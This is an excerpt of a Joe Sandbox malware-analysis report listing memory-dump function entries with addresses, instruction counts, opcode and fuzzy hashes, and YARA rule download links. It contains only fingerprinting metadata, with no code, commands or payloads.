              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b55081ca8445a163bcd8d71a92935d6336946215561f6721327c0447ac03f1f
              • Instruction ID: 3290d86203f90a39f5e51f1f72d8d531f600f42484d7ac3a01ec5d21c8849ed1
              • Opcode Fuzzy Hash: 3b55081ca8445a163bcd8d71a92935d6336946215561f6721327c0447ac03f1f
              • Instruction Fuzzy Hash: 6321AE71A1890ECEEB50EB6888AD6B977E5FF5A300F4049B6D11CD31A6EE38B5409780
              Function 00007FFD347933F1 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction ID: ae6b2ee9e1b5831e2c475b2672928606ae44ecc5361abcae0f8f17591d7068b2
              • Opcode Fuzzy Hash: ebb9cd70b96e60d722dfef1afdc9a125710ddf9499886af5e6c9088732858076
              • Instruction Fuzzy Hash: 27217F70A4864ECFEB95EB6488A92BA77E0FF1A304F0008BAD419D6191DF38A554D781
              Function 00007FFD347A3EFA Relevance: .1, Instructions: 82COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5ecebbeb7c3fdf93e41342cee421e28ca8ea53bebff149fb5de62bdd2029e563
              • Instruction ID: ae76312d7b4da48b23deabab8bb9d854374b0701a3f2a06a35e8aaceab359055
              • Opcode Fuzzy Hash: 5ecebbeb7c3fdf93e41342cee421e28ca8ea53bebff149fb5de62bdd2029e563
              • Instruction Fuzzy Hash: D121FBB2A1D58A9FE791EF7888A51FD7BF0EF06310F0440B7D958C7293DA38A4448781
              Function 00007FFD347A7881 Relevance: .1, Instructions: 82COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4a8499a961abc29846855c9d1b07b5b5bd037203d9e3bd48bf6259193c29787
              • Instruction ID: f893f9eb34a73e409da115120c550eb4e15c57940616ad2a0dc4824f08d02c85
              • Opcode Fuzzy Hash: f4a8499a961abc29846855c9d1b07b5b5bd037203d9e3bd48bf6259193c29787
              • Instruction Fuzzy Hash: F6213171A1954ECEEB91AB7888992FE77E0FF1A300F0049B6D518D6191EA38F540D782
              Function 00007FFD347A7FB6 Relevance: .1, Instructions: 78COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bb9a7d19a75e074cc2ad255ee98366d11ed6c4fac61b07d406eae916016bd7e1
              • Instruction ID: 5a76d07e1cf133327e75df84ee1e3d0ba0fed72ee6a8ac666563824462d214ee
              • Opcode Fuzzy Hash: bb9a7d19a75e074cc2ad255ee98366d11ed6c4fac61b07d406eae916016bd7e1
              • Instruction Fuzzy Hash: B52144B1E0951ACFDB94EB98C8A09EDB7F1FF59310F10457AD109E7285DA38B901DBA0
              Function 00007FFD3479A921 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction ID: 470d1fbb3d9cddcb7076282c2ba81f86d7dfa25d17a5c9f252dffec1be3b4f6f
              • Opcode Fuzzy Hash: 0e06a67eedb2fdea81d1be31a66e8a61ee6ccc00d2defed7c2cfe4a7dd7a242e
              • Instruction Fuzzy Hash: 0B214A70A1864D8FDB89EF68C495AE93BF0FF69315F01416AE80AD7251DB34E951CB80
              Function 00007FFD347A2B10 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9e607a1f09b9ef201b89e871367ee9bfcde469aefad86b732787f646bf813b8
              • Instruction ID: 39240df42712ccb5d0e9b5d263e9e0386541b927042656f671365fda1a4a734a
              • Opcode Fuzzy Hash: c9e607a1f09b9ef201b89e871367ee9bfcde469aefad86b732787f646bf813b8
              • Instruction Fuzzy Hash: 6D21817194E6C98FD7869B2048B51A57FB0EF17300B1600EBC449CB6D3EA2D6559C751
              Function 00007FFD347A2678 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: abde656c1657a8ec1458ff0b194f143bcdac4ac104627183b54b6aa6c2661996
              • Instruction ID: a222959fc54c09ce8aab1de71dd5e09512577ccb8ec0e196660ea8aee346d2ca
              • Opcode Fuzzy Hash: abde656c1657a8ec1458ff0b194f143bcdac4ac104627183b54b6aa6c2661996
              • Instruction Fuzzy Hash: 8621233048E2C58FD7478B7088755F53FB0AF07214F0900EBD489CB1A3C92D2565C352
              Function 00007FFD34793350 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction ID: 9ba8daaf3d6f6c91b7e397311d111ef2c5d19fe09b82ca086385cd23cb80280a
              • Opcode Fuzzy Hash: f9d6e85bd04ba03fc21b7116b0de2ea2296ec5ec186aadfe05d48cf9ee51c080
              • Instruction Fuzzy Hash: 6E21C67054D28A8FD342EBB488686A97FF0FF4B310F0544E6C045CB062DA3C9545C750
              Function 00007FFD347A28F1 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 80651f14cf0a170ffbc9937e9139424192b34913fd29173416315aef629d1954
              • Instruction ID: a5446c0f8fceb5e79a0327ce160554fd91444059eff73bcccb0a3fd6341d794c
              • Opcode Fuzzy Hash: 80651f14cf0a170ffbc9937e9139424192b34913fd29173416315aef629d1954
              • Instruction Fuzzy Hash: D311BE70A086498FDB88DF28D4A61F93BE1FF5A310F01017EE80AD3281CB38B551DB81
              Function 00007FFD347A7201 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0b04476e8e34e083532a0a4c65e094c1697fe298907586cb63c4647c09525d95
              • Instruction ID: ae7351827cf3cbb2b28761a085eb8d3095be41c26cb1138228dda0f3bbd26af6
              • Opcode Fuzzy Hash: 0b04476e8e34e083532a0a4c65e094c1697fe298907586cb63c4647c09525d95
              • Instruction Fuzzy Hash: A911B470A08A0E8FDB94EF6484692FD77B0FF19305F00057BE409D6292DB38A440C780
              Function 00007FFD347A72A5 Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bc9ae20c07f40cebbf1387f66db5dac4556e7286f0450c12fa35185fa6d2a6ec
              • Instruction ID: 18c3871efada048badfd791ded2e9ddd46319596248f03ef3617bda71a95ea0a
              • Opcode Fuzzy Hash: bc9ae20c07f40cebbf1387f66db5dac4556e7286f0450c12fa35185fa6d2a6ec
              • Instruction Fuzzy Hash: 5311B471A0964ECFEB95EF6884A92FD7BF0FF59301F00057ED809D2292DA39A440C781
              Function 00007FFD347A4BB5 Relevance: .1, Instructions: 64COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cc8f296da0fd93e0e3e61cddaa043e6acea8580c7bd3a06365b740f0e335208
              • Instruction ID: aa42ababa476db2cc68c9bd367dcaddec6413f19a7caaf0338ee417c2825fd22
              • Opcode Fuzzy Hash: 3cc8f296da0fd93e0e3e61cddaa043e6acea8580c7bd3a06365b740f0e335208
              • Instruction Fuzzy Hash: A3117271A0964E9FDB98EF6884A92BD7BE0FF59305F0005BED40DD2292DA3AA544C781
              Function 00007FFD347A4B19 Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3490b15db0314cf6020755938179e50f09e52f5277e44a9bc957e8209c06d97f
              • Instruction ID: 6a02271b2a9c4657f62c15f86d9f939864cb473b6505559ab7d8a0e74cf8db77
              • Opcode Fuzzy Hash: 3490b15db0314cf6020755938179e50f09e52f5277e44a9bc957e8209c06d97f
              • Instruction Fuzzy Hash: D611B770909A4E8FDB95DF6884692BD77A1FF19301F4001BBD40DC3292DB39A544C781
              Function 00007FFD347A50D5 Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6dba1cb09c6b4d88cfc3ae5aea53d63b285cfc52ce6536f37ff5c31ca4245a38
              • Instruction ID: 13c3f9dbbc908579e063ff8f9d1556866fe99b2c28535fc0e4abd3d91543198d
              • Opcode Fuzzy Hash: 6dba1cb09c6b4d88cfc3ae5aea53d63b285cfc52ce6536f37ff5c31ca4245a38
              • Instruction Fuzzy Hash: BB11C8B1A0EA898BEBD5DF64C4F91B87BF0EF16308F0500BED50DC2692DD296454C741
              Function 00007FFD3479085D Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 69fcc99c5b6e9c6b8b9053a0af3ba9319b06c542507c7006d33d69824c2ed14e
              • Instruction ID: 6e2a7c2fe37166a7d79d2f26f899b31e7cd083db20bc9abaeef61836f3f5a2fa
              • Opcode Fuzzy Hash: 69fcc99c5b6e9c6b8b9053a0af3ba9319b06c542507c7006d33d69824c2ed14e
              • Instruction Fuzzy Hash: 0401F562B2C6CADEE751EBB884A89A937E0EF57300F1144B2C548C6053ED38B485C2D1
              Function 00007FFD347A54E9 Relevance: .1, Instructions: 59COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29baa4347c1c060840f125859efc7b86f50339236f3d4555b131620500eda74b
              • Instruction ID: 18072e7ef556732b9b5a7bc44ef1b4642f709e5bc56a49700d629e41d033c999
              • Opcode Fuzzy Hash: 29baa4347c1c060840f125859efc7b86f50339236f3d4555b131620500eda74b
              • Instruction Fuzzy Hash: 4E116370A1964A8FDB95EB6484692BE77F1FF1A304F4004BBD40DD6192DA38A440D781
              Function 00007FFD347A63D1 Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1844d09fc5ffc5caed3a772d3fd5b1c8796ef51d0a1c3ba4db46743ef6949dd
              • Instruction ID: 44683cd8eb7a824977b6cebf63915065172b4e55632191c6448dcd9cc0b459bc
              • Opcode Fuzzy Hash: e1844d09fc5ffc5caed3a772d3fd5b1c8796ef51d0a1c3ba4db46743ef6949dd
              • Instruction Fuzzy Hash: 93112B71A09549CFEBA4EF2484BA2B97BE1FF16300F4104BED44DC22A2DE39B550C781
              Function 00007FFD347A7991 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6b159a61a22a47115d31900f88e01eec3b889fe8deecdc15e44b3c495fc78213
              • Instruction ID: a358b836e4eb836417989a498c0d181d3463adfde05aaf84e6edfab91bf3623a
              • Opcode Fuzzy Hash: 6b159a61a22a47115d31900f88e01eec3b889fe8deecdc15e44b3c495fc78213
              • Instruction Fuzzy Hash: E1118E71A0A54A8FE781EB74C8986EA7BF4EF1A300F0009B7D419D7162DA38E540C750
              Function 00007FFD347A2D01 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ed3faafaf01940b45a91a12b2222b24670e30b9234bc217e068927956b26630a
              • Instruction ID: 90f1cda6a103af4a3e28ea03aa0329fb1340b2b1bf69094ed66a6f91d8ba9642
              • Opcode Fuzzy Hash: ed3faafaf01940b45a91a12b2222b24670e30b9234bc217e068927956b26630a
              • Instruction Fuzzy Hash: 98019670A1964EDFE791EB74849C6FA7BF1FF1A300F0044B6D418C71A2EA38A154C781
              Function 00007FFD347A1221 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ecb9e950be994e78ce02bd919054839f7bdc5963a77ed4b72c3a2f1385949fd4
              • Instruction ID: b1db04e6b1c9c1f0c5a76caa4743f3fdc71286d988cda832e95b3ebdbf6e2535
              • Opcode Fuzzy Hash: ecb9e950be994e78ce02bd919054839f7bdc5963a77ed4b72c3a2f1385949fd4
              • Instruction Fuzzy Hash: B7116D70A0964D8FEB94EF64C4A82FD7BE1FF2A305F1005BAD519D22D2DE39A540C741
              Function 00007FFD3479BB78 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 79b6b56062da05b66dbb42b5e1cab99ede56a36750b511b826dd32ad1b15afee
              • Instruction ID: 9c3df3885edc69ac27ee55ea7ff49642cf3b63767bc2d41dd5941bbad0413aa9
              • Opcode Fuzzy Hash: 79b6b56062da05b66dbb42b5e1cab99ede56a36750b511b826dd32ad1b15afee
              • Instruction Fuzzy Hash: 9121EBB0E0461ACEEB64DF14C8A57EDB6B0FF56300F5001BAC50DA6291DB782A84DF81
              Function 00007FFD347A73DD Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9588f7ba779137c97f49a224f09f166f5132a417df722eab53aa8d48c50c8671
              • Instruction ID: 587c4d2c2a652b0c321e22254b874d29a2236cfe846c431d90467bbbdfdc8031
              • Opcode Fuzzy Hash: 9588f7ba779137c97f49a224f09f166f5132a417df722eab53aa8d48c50c8671
              • Instruction Fuzzy Hash: 0611C471A0964A8FEBD8EF1484A52F97BE0EF56300F0001BAD909C2292DA39B454D7C1
              Function 00007FFD3479BBAE Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfb0c8bc3b5324576871dece35b5e8541961c41b9bcd1bc9893c9ad6cb6a71f8
              • Instruction ID: 0dc46fef8f3116e6fbcd56af5573e05d566e8a8b3ca42ba8b01b2e05eaebb28b
              • Opcode Fuzzy Hash: bfb0c8bc3b5324576871dece35b5e8541961c41b9bcd1bc9893c9ad6cb6a71f8
              • Instruction Fuzzy Hash: 8E21CAB0E1451ACEEBA5EB24C8A57E977B1FF46300F5001FAD50DE2291DE782A85DF80
              Function 00007FFD347A4F29 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 110a86085b5373f1810fb4a38008cd3a7e44d2e1ba256b06a7fcda8befcc79a4
              • Instruction ID: 17748d97392eb493e5f53d0adef2ef2ade8206db91fcc65d959b6adabb483897
              • Opcode Fuzzy Hash: 110a86085b5373f1810fb4a38008cd3a7e44d2e1ba256b06a7fcda8befcc79a4
              • Instruction Fuzzy Hash: DC11A770A1D68A8FE791EB6488682B977E0FF16310F0544B7D408C71A3EA38B5448781
              Function 00007FFD347A51FD Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6fa260c41404949969ca4d55592e79416bd196097bed9f869bebe93589de6930
              • Instruction ID: 1061b6639bc34b700f07a79c681504a9d322d5a4a024c9335ab32a066e519264
              • Opcode Fuzzy Hash: 6fa260c41404949969ca4d55592e79416bd196097bed9f869bebe93589de6930
              • Instruction Fuzzy Hash: 7A1191B0A1964A8FEBD4EF6484A92BE77B0FF19304F0005BED409D6692DB39A550C781
              Function 00007FFD347A6589 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 09ffc9c00fcc3bee178668fbe76acc6e02f9dca3f086dd843a6a94d685a39b31
              • Instruction ID: aab93bbf9b435a1f49b8148730c42e8f8d9ceccb477fb644f4fddd4f35bf0c69
              • Opcode Fuzzy Hash: 09ffc9c00fcc3bee178668fbe76acc6e02f9dca3f086dd843a6a94d685a39b31
              • Instruction Fuzzy Hash: 2A11E371A0964A8FE7A1EB6484A92B97BF0FF16300F0505B6D558D71A2EE38A4408781
              Function 00007FFD347A545D Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91e25ba96770bc41d9c13f250a7e79a29017dada9480ec25f392947ec5973c8d
              • Instruction ID: aeb4c47434073ee9bd231ee2ec2b4e3c1861d1302454b63e18ec22045e2b3135
              • Opcode Fuzzy Hash: 91e25ba96770bc41d9c13f250a7e79a29017dada9480ec25f392947ec5973c8d
              • Instruction Fuzzy Hash: C6119E70A19A5A8FEBD4EF6484696BE77F1FF19305F4004BAD80DD2292DE38A550C781
              Function 00007FFD3479BFC5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 917d10d61471832b2ea0bb7d58b665d7987b5589e5f97dbecd79619d6c127cf3
              • Instruction ID: 49ea2f3ce8db4efaa9bb0338126a04332cbb1c931e243876bcf74aa5cc574f16
              • Opcode Fuzzy Hash: 917d10d61471832b2ea0bb7d58b665d7987b5589e5f97dbecd79619d6c127cf3
              • Instruction Fuzzy Hash: CC116570A1864D9FEB84EF68C4A92BE77F1FF1A300F51087AD409D6192DF38A554C740
              Function 00007FFD347934E5 Relevance: .1, Instructions: 51COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cbde385cfab4c851bca94549d058f94c3d5b4b3c2df162e3fec37287234dc57f
              • Instruction ID: 88bb4c422919a6a18517f063d902cdaa3e9a80967d895dc18a89fd245e893afb
              • Opcode Fuzzy Hash: cbde385cfab4c851bca94549d058f94c3d5b4b3c2df162e3fec37287234dc57f
              • Instruction Fuzzy Hash: 66016170A1868E8FDB94EF74C4A96BE77E0FF19300F4008BED519D6192DB38A540C740
              Function 00007FFD347A7EA9 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 38f3b75b538ca66c17a01c0184bcbd30d1661ce5e71cbe16a1de5582f78f4930
              • Instruction ID: 0ea51f43c88b579dcbaea40e65354c5193aaed2fd15b0b9ab15dcca912e28c73
              • Opcode Fuzzy Hash: 38f3b75b538ca66c17a01c0184bcbd30d1661ce5e71cbe16a1de5582f78f4930
              • Instruction Fuzzy Hash: 3511AC71A0E6898FDB85DB2488A82FD7BF0FF16300F0008BAD409C6292DA39A904D740
              Function 00007FFD3479D9AD Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aad8440dab6134736c0413c4802cfcb53815de9672553a1d16de1c73be953473
              • Instruction ID: fcc3cd0c288ab86b68af26f018a3f137005a9e01dbe858dead7b2ac430fedd52
              • Opcode Fuzzy Hash: aad8440dab6134736c0413c4802cfcb53815de9672553a1d16de1c73be953473
              • Instruction Fuzzy Hash: 5F11AD71A1C68D8FEB94EF68C8A92BD7BF0FF1A310F0104BED50AC2192DA39A550C740
              Function 00007FFD347905D8 Relevance: .0, Instructions: 50COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86907206f8e2ce5fb8b64602424b9e6038d23696b0289bcba9870291ac936615
              • Instruction ID: 4a73ab0103962c4668003449fd7f9adb82dd8c4e8d7e67b9854f8c55e91724ff
              • Opcode Fuzzy Hash: 86907206f8e2ce5fb8b64602424b9e6038d23696b0289bcba9870291ac936615
              • Instruction Fuzzy Hash: 1F015E70A0850ECFEB98EF24C0A56B977A1FF5A305F50457ED40ED2191CE39B564DB80
              Function 00007FFD347A8251 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd347a0000_System.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bd0366a64a3d528392972af58b256a0e996815ab1c8f0a3a6e7d912785471a71
              • Instruction ID: 7e1b1e6626252da8ff22f85ff1354e98166bfb10fde697d5cea4a5e21f37a889
              • Opcode Fuzzy Hash: bd0366a64a3d528392972af58b256a0e996815ab1c8f0a3a6e7d912785471a71
              • Instruction Fuzzy Hash: E001D470A196098FDB99EF60C4A92BE77A0FF1A304F5104BED40AC62D2EF38A510C780
              Function 00007FFD34792E71 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001F.00000002.2235394410.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_31_2_7ffd34790000_System.jbxd
              Similarity
              • API ID:
